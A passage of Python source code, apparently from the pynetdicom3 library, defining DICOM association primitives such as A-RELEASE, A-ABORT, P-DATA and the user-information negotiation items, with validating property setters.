provider issues an A-RELEASE indication to the Acceptor. The\n Acceptor shall not issue any other primitives other than A-RELEASE response,\n A-ABORT request or P-DATA request.\n 3. To complete the release, the Acceptor replies using an A-RELEASE response\n primitive, with \"affirmative\" as the result parameter.\n 4. After the Acceptor issues the A-RELEASE response it shall not issue any\n more primitives.\n 5. The Requestor shall issue an A-RELEASE confirmation primitive always\n with an \"affirmative\" value for the Result parameter.\n 6. A user may disrupt the release by issuing an A-ABORT request.\n 7. A collision may occur when both users issue A-RELEASE requests\n simultaneously. In this situation both users receive an unexpect A-RELEASE\n indication primitive (instead of an A-RELEASE acceptance):\n\n a. The association requestor issues an A-RELEASE response primitive\n b. The association acceptor waits for an A-RELEASE confirmation\n primitive from its peer. When it receives one it issues an A-RELEASE\n response primitive\n c. 
The association requestor receives an A-RELEASE confirmation\n primitive.\n\n When both ACSE users have received an A-RELEASE confirmation primitive the\n association shall be released.\n\n Parameter Request Indication Response Confirmation\n reason UF UF(=) UF UF(=)\n user info NU NU(=) NU NU(=)\n result MF MF(=)\n\n UF - User option, fixed\n NU - Not used\n MF - Mandatory, fixed\n (=) - shall have same value as request or response\n\n See PS3.8 Section 7.2\n\n Attributes\n ----------\n reason : str\n Fixed value of \"normal\". Identifies the general level of urgency of the\n request\n PS3.8 7.2.1.1, [UF, UF(=), UF, UF(=)]\n result : str or None\n Must be None for request and indication, \"affirmative\" for response\n and confirmation\n PS3.8 7.2.1.2, [-, -, MF, MF(=)]\n \"\"\"\n\n def __init__(self):\n self.result = None\n\n @property\n def reason(self):\n \"\"\"Return the Reason parameter.\"\"\"\n return \"normal\"\n\n @property\n def result(self):\n \"\"\"Return the Result parameter.\"\"\"\n return self._result\n\n @result.setter\n def result(self, value):\n \"\"\"Set the Result parameter.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is not None and value != \"affirmative\":\n LOGGER.error(\"A_RELEASE.result must be None or 'affirmative'\")\n raise ValueError(\"A_RELEASE.result must be None or 'affirmative'\")\n\n self._result = value\n\n\nclass A_ABORT(object):\n \"\"\"A-ABORT Parameters\n\n See PS3.8 Section 7.3.1\n\n Attributes\n ----------\n abort_source : int\n Indicates the initiating source of the abort. Allowed values are:\n * 0: UL service-user\n * 2: UL service-provider\n\n PS3.8 7.3.1.1, [-, M, X, X]\n \"\"\"\n\n def __init__(self):\n self.abort_source = None\n\n @property\n def abort_source(self):\n \"\"\"Return the Abort Source.\"\"\"\n if self._abort_source is None:\n LOGGER.error(\"A_ABORT.abort_source parameter not set\")\n raise ValueError(\"A_ABORT.abort_source value not set\")\n\n return self._abort_source\n\n @abort_source.setter\n def abort_source(self, value):\n \"\"\"Set the Abort Source.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value in [0, 2]:\n self._abort_source = value\n elif value is None:\n self._abort_source = None\n else:\n LOGGER.error(\"Attempted to set A_ABORT.abort_source to an \"\n \"invalid value\")\n raise ValueError(\"Attempted to set A_ABORT.abort_source to an \"\n \"invalid value\")\n\n\nclass A_P_ABORT(object):\n \"\"\"A-P-ABORT Parameters.\n\n See PS3.8 Section 7.4.1\n\n Attributes\n ----------\n provider_reason : int\n Indicates the reason for the abort. 
Allowed values are:\n * 0: reason not specified\n * 1: unrecognised PDU\n * 2: unexpected PDU\n * 4: unrecognised PDU parameter\n * 5: unexpected PDU parameter\n * 6: invalid PDU parameter value\n\n PS3.8 7.3.1.1, [P, X, X, X]\n \"\"\"\n\n def __init__(self):\n self.provider_reason = None\n\n @property\n def provider_reason(self):\n \"\"\"Return the Provider Reason.\"\"\"\n if self._provider_reason is None:\n LOGGER.error(\"A_ABORT.provider_reason parameter not set\")\n raise ValueError(\"A_ABORT.provider_reason value not set\")\n\n return self._provider_reason\n\n @provider_reason.setter\n def provider_reason(self, value):\n \"\"\"Set the Provider Reason.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value in [0, 1, 2, 4, 5, 6]:\n self._provider_reason = value\n elif value is None:\n self._provider_reason = None\n else:\n LOGGER.error(\"Attempted to set A_ABORT.provider_reason to an \"\n \"invalid value\")\n raise ValueError(\"Attempted to set A_ABORT.provider_reason to an \"\n \"invalid value\")\n\n\nclass P_DATA(object):\n \"\"\"P-DATA Parameters.\n\n See PS3.8 Section 7.6.1\n\n Attributes\n ----------\n presentation_data_value_list : list of [int, bytes]\n Contains one or more Presentation Data Values (PDV), each consisting of\n a Presentation Context ID and User Data values. The User Data values are\n taken from the Abstract Syntax and encoded in the Transfer Syntax\n identified by the Presentation Context ID. Each item in the list is\n [Context ID, PDV Data]\n PS3.8 7.6.1, [M, M(=), x, x]\n \"\"\"\n\n def __init__(self):\n self.presentation_data_value_list = []\n\n @property\n def presentation_data_value_list(self):\n \"\"\"Return the Presentation Data Value List.\"\"\"\n return self._presentation_data_value_list\n\n @presentation_data_value_list.setter\n def presentation_data_value_list(self, value_list):\n \"\"\"Set the Presentation Data Value List.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value_list, list):\n for pdv in value_list:\n if isinstance(pdv, list):\n if isinstance(pdv[0], int) and isinstance(pdv[1], bytes):\n pass\n else:\n raise TypeError(\"P_DATA.presentation_data_value_list \"\n \"should be a list of [int, bytes]\")\n else:\n raise TypeError(\"P_DATA.presentation_data_value_list \"\n \"should be a list of [ID, PDV]\")\n else:\n raise TypeError(\"P_DATA.presentation_data_value_list \"\n \"should be a list of [int, bytes]\")\n\n self._presentation_data_value_list = value_list\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = 'P-DATA\\n'\n for pdv in self.presentation_data_value_list:\n s += ' Context ID: {0!s}\\n'.format(pdv[0])\n s += ' Value Length: {0!s} bytes\\n'.format(len(pdv[1]))\n header_byte = pdv[1][0]\n\n # Python 2 compatibility\n if isinstance(header_byte, str):\n header_byte = ord(header_byte)\n\n s += \" Message Control Header Byte: {:08b}\\n\".format(header_byte)\n\n # xxxxxx01 and xxxxxx011\n if header_byte & 1:\n # xxxxxx11\n if header_byte & 2:\n s += ' Command information, last fragment of the ' \\\n 'DIMSE message\\n'\n # xxxxxx01\n else:\n s += ' Command information, not the last fragment of ' \\\n 'the DIMSE message\\n'\n # xxxxxx00, xxxxxxx10\n else:\n # xxxxxx10\n if header_byte & 2 != 0:\n s += ' Dataset information, last fragment of the ' \\\n 'DIMSE message\\n'\n # xxxxxx00\n else:\n s += ' Dataset information, not the last fragment of ' \\\n 'the DIMSE message\\n'\n\n # Remaining data\n #s += pretty_bytes(pdv[1][1:], ' ', max_size=512)\n\n return s\n\n\n# User 
Information Negotiation primitives\nclass MaximumLengthNegotiation(ServiceParameter):\n \"\"\"Define the Maximum Length Negotiation primitive.\n\n The maximum length notification allows communicating AEs to limit the size\n of the data for each P-DATA indication. This notification is required for\n all DICOM v3.0 conforming implementations.\n\n This User Information item is required during Association negotiation and\n there must only be a single MaximumLengthNegotiation item\n\n PS3.7 Annex D.3.3.1 and PS3.8 Annex D.1\n\n Attributes\n ----------\n maximum_length_received : int\n The maximum length received value for the Maximum Length sub-item in\n bytes. A value of 0 indicates unlimited length (31682 bytes default).\n \"\"\"\n\n def __init__(self):\n self.maximum_length_received = 16382\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.MaximumLengthSubItem\n \"\"\"\n item = MaximumLengthSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def maximum_length_received(self):\n \"\"\"Return the Maximum Length Received.\"\"\"\n return self._maximum_length\n\n @maximum_length_received.setter\n def maximum_length_received(self, val):\n \"\"\"User defined Maximum Length to be used during an Association.\n\n Parameters\n ----------\n val : int\n The maximum length of each P-DATA in bytes, must be equal to or\n greater than 0. A value of 0 indicates an unlimited maximum length.\n\n Raises\n ------\n ValueError\n If `maximum_length_received` is negative\n TypeError\n If `maximum_length_received` is not an int\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(val, int):\n if val < 0:\n LOGGER.error('Maximum Length Received must be greater than 0')\n raise ValueError(\"Maximum Length Received must be greater \"\n \"than 0\")\n else:\n self._maximum_length = val\n else:\n LOGGER.error(\"Maximum Length Received must be numerical\")\n raise TypeError(\"Maximum Length Received must be numerical\")\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Maximum Length Negotiation\\n\"\n s += \" Maximum length received: {0:d} bytes\\n\".format(\n self.maximum_length_received)\n return s\n\n\nclass ImplementationClassUIDNotification(ServiceParameter):\n \"\"\"The Implementation Class UID Notification primitive.\n\n The implementation identification notification allows implementations of\n communicating AEs to identify each other at Association establishment time.\n It is intended to provider respective and non-ambiguous identification in\n the event of communication problems encountered between two nodes. 
This\n negotiation is required.\n\n Implementation identification relies on two pieces of information:\n - Implementation Class UID (required)\n - Implementation Version Name (optional)\n\n The Implementation Class UID is required during Association negotiation and\n there must only be a single ImplementationClassUID item\n\n PS3.7 Annex D.3.3.2\n\n Example\n -------\n impl_class_uid = ImplementationClassUID()\n impl_class_uid.implementation_class_uid = '1.1.2.2.3.3.4'\n\n usr_data_neg = []\n usr_data_neg.append(impl_class_uid)\n\n Attributes\n ----------\n implementation_class_uid : pydicom.uid.UID, bytes or str\n The UID to use\n \"\"\"\n\n def __init__(self):\n self.implementation_class_uid = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.ImplementationClassUIDSubItem\n\n Raises\n ------\n ValueError\n If no UID is set\n \"\"\"\n if self.implementation_class_uid is None:\n LOGGER.error(\"The Implementation Class UID must be set prior to \"\n \"requesting Association\")\n raise ValueError(\"The Implementation Class UID must be set \"\n \"prior to requesting Association\")\n\n item = ImplementationClassUIDSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def implementation_class_uid(self):\n \"\"\"Return the Implementation Class UID.\"\"\"\n return self._implementation_class_uid\n\n @implementation_class_uid.setter\n def implementation_class_uid(self, value):\n \"\"\"Sets the Implementation Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The value for the Implementation Class UID\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n raise TypeError(\"Implementation Class UID must be a \"\n \"pydicom.uid.UID, str or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._implementation_class_uid = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Implementation Class UID\\n\"\n s += \" Implementation class UID: {0!s}\\n\" \\\n .format(self.implementation_class_uid)\n return s\n\n\nclass ImplementationVersionNameNotification(ServiceParameter):\n \"\"\"The Implementation Version Name Notification primitive.\n\n The implementation identification notification allows implementations of\n communicating AEs to identify each other at Association establishment time.\n It is intended to provider respective and non-ambiguous identification in\n the event of communication problems encountered between two nodes. 
This\n negotiation is required.\n\n Implementation identification relies on two pieces of information:\n - Implementation Class UID (required)\n - Implementation Version Name (optional)\n\n The Implementation Version Name is optional and there may only be a single\n ImplementationVersionName item\n\n PS3.7 Annex D.3.3.2\n\n Attributes\n ----------\n implementation_version_name : str or bytes\n The version name to use, maximum of 16 characters\n \"\"\"\n\n def __init__(self):\n self.implementation_version_name = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.ImplementationVersionNameSubItem\n\n Raises\n ------\n ValueError\n If no name is set\n \"\"\"\n if self.implementation_version_name is None:\n raise ValueError(\"Implementation Version Name must be set prior \"\n \"to Association\")\n\n item = ImplementationVersionNameSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def implementation_version_name(self):\n \"\"\"Return the Implementation Version Name.\"\"\"\n return self._implementation_version_name\n\n @implementation_version_name.setter\n def implementation_version_name(self, value):\n \"\"\"Sets the Implementation Version Name parameter.\n\n Parameters\n ----------\n value : str or bytes\n The value for the Implementation Version Name\n\n Raises\n ------\n TypeError\n If `value` is not a str or bytes\n ValueError\n If `value` is empty or longer than 16 characters\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, str):\n value = codecs.encode(value, 'utf-8')\n elif isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Implementation Version Name must be a str or bytes\")\n raise TypeError(\"Implementation Version Name must be a str \"\n \"or bytes\")\n\n if value is not None and not 1 < len(value) < 17:\n raise ValueError(\"Implementation Version Name must be \"\n \"between 1 and 16 characters long\")\n\n self._implementation_version_name = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Implementation Version Name\\n\"\n s += \" Implementation version name: {0!s}\\n\".format(\n self.implementation_version_name)\n return s\n\n\nclass AsynchronousOperationsWindowNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to negotiate the maximum number of outstanding operation\n or sub-operation requests. This negotiation is optional.\n\n The Asynchronous Operations Window is optional and there may only be a\n single AsynchronousOperationsWindowNegotiation item\n\n PS3.7 Annex D.3.3.3\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n maximum_number_operations_invoked : int\n The maximum number of asynchronous operations invoked by the AE. A\n value of 0 indicates unlimited operations (default 1)\n maximum_number_operations_performed : int\n The maximum number of asynchronous operations performed by the AE. 
A\n value of 0 indicates unlimited operations (default 1)\n \"\"\"\n\n def __init__(self):\n self.maximum_number_operations_invoked = 1\n self.maximum_number_operations_performed = 1\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.AsynchronousOperationsWindowSubItem\n \"\"\"\n item = AsynchronousOperationsWindowSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def maximum_number_operations_invoked(self):\n \"\"\"Return the Maximum Number Operations Invoked.\"\"\"\n return self._maximum_number_operations_invoked\n\n @maximum_number_operations_invoked.setter\n def maximum_number_operations_invoked(self, value):\n \"\"\"Sets the Maximum Number Operations Invoked parameter.\n\n Parameters\n ----------\n value : int\n The maximum number of operations invoked\n\n Raises\n ------\n TypeError\n If `value` is not an int\n ValueError\n If `value` is less than 0\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, int):\n pass\n else:\n LOGGER.error(\"Maximum Number Operations Invoked must be an int\")\n raise TypeError(\"Maximum Number Operations Invoked must be an int\")\n\n if value < 0:\n raise ValueError(\"Maximum Number Operations Invoked must be \"\n \"greater than 0\")\n\n self._maximum_number_operations_invoked = value\n\n @property\n def maximum_number_operations_performed(self):\n \"\"\"Return the Maximum Number Operations Performed.\"\"\"\n return self._maximum_number_operations_performed\n\n @maximum_number_operations_performed.setter\n def maximum_number_operations_performed(self, value):\n \"\"\"\n Sets the Maximum Number Operations Performed parameter\n\n Parameters\n ----------\n value : int\n The maximum number of operations performed\n\n Raises\n ------\n TypeError\n If `value` is not an int\n ValueError\n If `value` is less than 0\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if not isinstance(value, int):\n LOGGER.error(\"Maximum Number Operations Performed must be an int\")\n raise TypeError(\"Maximum Number Operations Performed must be \"\n \"an int\")\n\n if value < 0:\n raise ValueError(\"Maximum Number Operations Performed must be \"\n \"greater than 0\")\n\n self._maximum_number_operations_performed = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Asynchronous Operations Window\\n\"\n s += \" Maximum number operations invoked: {0:d}\\n\".format(\n self.maximum_number_operations_invoked)\n s += \" Maximum number operations performed: {0:d}\\n\".format(\n self.maximum_number_operations_performed)\n return s\n\n\nclass SCP_SCU_RoleSelectionNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to negotiate the roles in which they will serve for each\n SOP Class or Meta SOP Class supported on the Association. 
This negotiation\n is optional.\n\n The Association Requestor may use one SCP/SCU Role Selection item for each\n SOP Class as identified by its corresponding Abstract Syntax Name and shall\n be one of three role values:\n - Requestor is SCU only\n - Requestor is SCP only\n - Requestor is both SCU/SCP\n\n If the SCP/SCU Role Selection item is absent the default role for a\n Requestor is SCU and for an Acceptor is SCP.\n\n For a Requestor support for each SOP Class shall be one of the following\n roles:\n * Requestor is SCU only\n * Requestor is SCP only\n * Requestor is both SCU and SCP\n\n PS3.7 Annex D.3.3.4\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n sop_class_uid : pydicom.uid.UID, bytes or str\n The UID of the corresponding Abstract Syntax\n scu_role : bool\n False for non-support of the SCU role, True for support\n scp_role : bool\n False for non-support of the SCP role, True for support\n \"\"\"\n\n def __init__(self):\n self.sop_class_uid = None\n self.scu_role = None\n self.scp_role = None\n\n def from_primitive(self):\n \"\"\"\n Convert the primitive to a PDU item ready to be encoded\n\n Returns\n -------\n item : pynetdicom3.pdu.SCP_SCU_RoleSelectionSubItem\n\n Raises\n ------\n ValueError\n If no SOP Class UID, SCU Role or SCP Role is set\n ValueError\n If SCU Role and SCP Role are both False\n \"\"\"\n if self.sop_class_uid is None or self.scu_role is None \\\n or self.scp_role is None:\n LOGGER.error(\"SOP Class UID, SCU Role and SCP Role must \"\n \"to be set prior to Association\")\n raise ValueError(\"SOP Class UID, SCU Role and SCP Role must \"\n \"to be set prior to Association\")\n\n # To get to this point self.sop_class_uid must be set\n if not self.scu_role and not self.scp_role:\n LOGGER.error(\"SCU and SCP Roles cannot both be unsupported \"\n \"for %s\", self.sop_class_uid)\n raise ValueError(\"SCU and SCP Roles cannot both be unsupported \"\n \"for {}\".format(self.sop_class_uid))\n\n item = SCP_SCU_RoleSelectionSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def sop_class_uid(self):\n \"\"\"Return the SOP Class UID.\"\"\"\n return self._sop_class_uid\n\n @sop_class_uid.setter\n def sop_class_uid(self, value):\n \"\"\"Sets the SOP Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The corresponding Abstract Syntax UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._sop_class_uid = value\n\n @property\n def scu_role(self):\n \"\"\"Return the SCU Role.\"\"\"\n return self._scu_role\n\n @scu_role.setter\n def scu_role(self, value):\n \"\"\"Sets the SCU Role parameter.\n\n Parameters\n ----------\n value : bool\n True if supported, False otherwise\n\n Raises\n ------\n TypeError\n If `value` is not a bool\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bool):\n pass\n elif value is None:\n pass\n 
else:\n LOGGER.error(\"SCU Role must be boolean\")\n raise TypeError(\"SCU Role must be boolean\")\n\n self._scu_role = value\n\n @property\n def scp_role(self):\n \"\"\"Return the SCP Role.\"\"\"\n return self._scp_role\n\n @scp_role.setter\n def scp_role(self, value):\n \"\"\"Sets the SCP Role parameter.\n\n Parameters\n ----------\n value : bool\n True if supported, False otherwise (default)\n\n Raises\n ------\n TypeError\n If `value` is not a bool\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bool):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"SCP Role must be boolean\")\n raise TypeError(\"SCP Role must be boolean\")\n\n self._scp_role = value\n\n\nclass SOPClassExtendedNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to exchange application information defined by specific\n Service Class specifications. Each Service Class is required to document\n the application information it supports and how this information is\n negotiated between SCUs and SCPs.\n\n The SOP Class Extended Negotiation is optional and there may only be a\n single SOPClassExtendedNegotiation item for each available SOP Class UID.\n\n PS3.7 Annex D.3.3.5\n\n PS3.4 contains Service Class Specifications\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n sop_class_uid : pydicom.uid.UID, bytes or str\n The UID of the SOP Class\n service_class_application_information : bytes\n The Service Class Application Information as per the Service Class\n Specifications (see PS3.4)\n \"\"\"\n\n def __init__(self):\n self.sop_class_uid = None\n self.service_class_application_information = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.SOPClassExtendedNegotiationSubItem\n\n Raises\n ------\n ValueError\n If `sop_class_uid` or `service_class_application_information` are\n not set\n \"\"\"\n if self.sop_class_uid is None \\\n or self.service_class_application_information is None:\n LOGGER.error(\"SOP Class UID and Service Class Application \"\n \"Information must be set prior to Association \"\n \"negotiation\")\n raise ValueError(\"SOP Class UID and Service Class Application \"\n \"Information must be set prior to Association \"\n \"negotiation\")\n\n item = SOPClassExtendedNegotiationSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def sop_class_uid(self):\n \"\"\"Return the SOP Class UID.\"\"\"\n return self._sop_class_uid\n\n @sop_class_uid.setter\n def sop_class_uid(self, value):\n \"\"\"Sets the SOP Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The corresponding Abstract Syntax UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._sop_class_uid = value\n\n @property\n def service_class_application_information(self):\n \"\"\"Return the Service 
Class Application Information.\"\"\"\n return self._service_class_application_information\n\n @service_class_application_information.setter\n def service_class_application_information(self, value):\n \"\"\"Sets the Service Class Application Information parameter.\n\n Parameters\n ----------\n value : bytes\n The Service Class Application Information as per the Service Class\n Specifications (see PS3.4)\n\n Raises\n ------\n TypeError\n If `value` is not a bytes object\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Service Class Application Information should be a \"\n \"bytes object\")\n raise TypeError(\"Service Class Application Information should \"\n \"be a bytes object\")\n\n self._service_class_application_information = value\n\n\nclass SOPClassCommonExtendedNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to exchange generic application information.\n\n The SOP Class Common Extended Negotiation is optional and there may only be\n a single SOPClassCommonExtendedNegotiation item for each available SOP\n Class UID.\n\n PS3.7 Annex D.3.3.6\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n sop_class_uid : pydicom.uid.UID, bytes or str\n The UID of the SOP Class\n service_class_uid : pydicom.uid.UID, bytes or str\n The UID of the corresponding Service Class\n related_general_sop_class_uid : list of (pydicom.uid.UID, bytes or str)\n Related General SOP Class UIDs (optional)\n \"\"\"\n\n def __init__(self):\n self.sop_class_uid = None\n self.service_class_uid = None\n self.related_general_sop_class_identification = []\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.SOPClassCommonExtendedNegotiationSubItem\n\n Raises\n ------\n ValueError\n If `sop_class_uid` or `service_class_uid` are not set\n \"\"\"\n if self.sop_class_uid is None or self.service_class_uid is None:\n LOGGER.error(\"SOP Class UID and Service Class UID must be set \"\n \"prior to Association negotiation\")\n raise ValueError(\"SOP Class UID and Service Class UID must be \"\n \"set prior to Association negotiation\")\n\n item = SOPClassCommonExtendedNegotiationSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def sop_class_uid(self):\n \"\"\"Return the SOP Class UID.\"\"\"\n return self._sop_class_uid\n\n @sop_class_uid.setter\n def sop_class_uid(self, value):\n \"\"\"Sets the SOP Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The SOP Class UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._sop_class_uid = value\n\n @property\n def service_class_uid(self):\n \"\"\"Return the Service Class UID.\"\"\"\n return self._service_class_uid\n\n @service_class_uid.setter\n def service_class_uid(self, 
value):\n \"\"\"Sets the Service Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The corresponding Service Class UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"Service Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"Service Class UID must be a pydicom.uid.UID, \"\n \"str or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._service_class_uid = value\n\n @property\n def related_general_sop_class_identification(self):\n \"\"\"Return the Related General SOP Class Identification\"\"\"\n return self._related_general_sop_class_identification\n\n @related_general_sop_class_identification.setter\n def related_general_sop_class_identification(self, uid_list):\n \"\"\"Sets the Service Class Application Information parameter.\n\n Parameters\n ----------\n uid_list : list of (pydicom.uid.UID, bytes or str)\n A list containing UIDs to be used in the Related General SOP Class\n Identification parameter\n\n Raises\n ------\n TypeError\n If `uid_list` is not a list\n ValueError\n If `uid_list` contains items that aren't UIDs\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(uid_list, list):\n # Test that all the items in the list are UID compatible and convert\n # them to pydicom.uid.UID if required\n valid_uid_list = []\n\n for uid in uid_list:\n if isinstance(uid, UID):\n pass\n elif isinstance(uid, str):\n uid = UID(uid)\n elif isinstance(uid, bytes):\n uid = UID(uid.decode('utf-8'))\n else:\n LOGGER.error(\"Related General SOP Class Identification \"\n \"must be a list of pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"Related General SOP Class \"\n \"Identification must be a list of \"\n \"pydicom.uid.UID, str or bytes\")\n\n if uid is not None and not uid.is_valid:\n LOGGER.error(\"Related General SOP Class \"\n \"Identification contains an invalid UID\")\n raise ValueError(\"Related General SOP Class contains \"\n \"an invalid UID\")\n\n valid_uid_list.append(uid)\n\n self._related_general_sop_class_identification = valid_uid_list\n else:\n LOGGER.error(\"Related General SOP Class Identification \"\n \"must be a list of pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"Related General SOP Class Identification \"\n \"must be a list of pydicom.uid.UID, str \"\n \"or bytes\")\n\n\nclass UserIdentityNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to exchange generic application information.\n\n The SOP Class Common Extended Negotiation is optional and there may only be\n a single SOPClassCommonExtendedNegotiation item for each available SOP\n Class UID.\n\n PS3.7 Annex D.3.3.7\n\n In general, a User Identity Negotiation request that is accepted will result\n in Association establishment and possibly a server response if requested\n and supported by the peer. 
If a server response is requested but not\n received then the Requestor must decide how to proceed.\n An Association rejected due to an authorisation failure will be indicated\n using Rejection Permanent with a Source of \"DICOM UL service provided (ACSE\n related function)\".\n\n How the Acceptor handles authentication is to be implemented by the end-user\n and is outside the scope of the DICOM standard.\n\n A-ASSOCIATE-RQ\n `user_identity_type`\n `positive_response_requested`\n `primary_field`\n `secondary_field`\n\n A-ASSOCIATE-AC\n The `server_response` parameter is required when a response to the User\n Identity Negotiation request is to be issued (although this depends on\n whether or not this is supported by the Acceptor).\n\n Attributes\n ----------\n user_identity_type : int or None\n A-ASSOCIATE-RQ only. One of the following values:\n * 1 - Username as string in UTF-8\n * 2 - Username as string in UTF-8 and passcode\n * 3 - Kerberos Service ticket\n * 4 - SAML Assertion\n positive_response_requested : bool\n A-ASSOCIATE-RQ only. True when requesting a response, False otherwise\n (default is False)\n primary_field : bytes or None\n A-ASSOCIATE-RQ only. Contains either the username, Kerberos Service\n ticket or SAML assertion depending on `user_identity_type`.\n secondary_field : bytes or None\n A-ASSOCIATE-RQ only. Only required if the `user_identity_type` is 2,\n when it should contain the passcode as a bytes object, None otherwise\n server_response : bytes or None\n A-ASSOCIATE-AC only. Shall contain the Kerberos Service ticket or SAML\n response if the `user_identity_type` in the Request was 3 or 4. Shall be\n None if `user_identity_type` was 1 or 2.\n \"\"\"\n\n def __init__(self):\n self.user_identity_type = None\n self.positive_response_requested = False\n self.primary_field = None\n self.secondary_field = None\n self.server_response = None\n\n 